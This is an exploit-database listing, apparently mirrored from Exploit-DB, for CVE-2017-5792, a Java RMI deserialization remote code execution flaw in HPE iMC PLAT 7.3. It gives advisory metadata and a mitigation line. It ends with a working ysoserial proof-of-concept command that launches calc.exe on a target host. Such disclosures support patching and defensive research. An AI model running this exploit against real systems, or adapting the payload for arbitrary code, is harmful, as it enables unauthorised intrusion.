HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability

vendor:

iMC PLAT

by:

Chris Lyne

9.8

CVSS

CRITICAL

Java RMI Registry Deserialization RCE

502

CWE

Product Name: iMC PLAT

Affected Version From: HPE iMC PLAT v7.3 (E0504) Standard

Affected Version To: HPE iMC PLAT v7.3 (E0504) Standard

Patch Exists: YES

Related CWE: CVE-2017-5792

CPE: a:hewlett_packard:imc_plat:7.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows Server 2008 R2 Enterprise 64-bit

2018

HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability

Chris Lyne (@lynerc) discovered a vulnerability in HPE iMC PLAT v7.3 (E0504) Standard, which allows remote attackers to execute arbitrary code via a crafted serialized Java object to the RMI service. This PoC will launch calc.exe.

Mitigation:

Update to the latest version of HPE iMC PLAT v7.3 (E0504) Standard.

Source

Exploit-DB raw data:

# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability
# Date: 01-28-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.3 (E0504) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5792
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/

# note that this PoC will launch calc.exe

$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe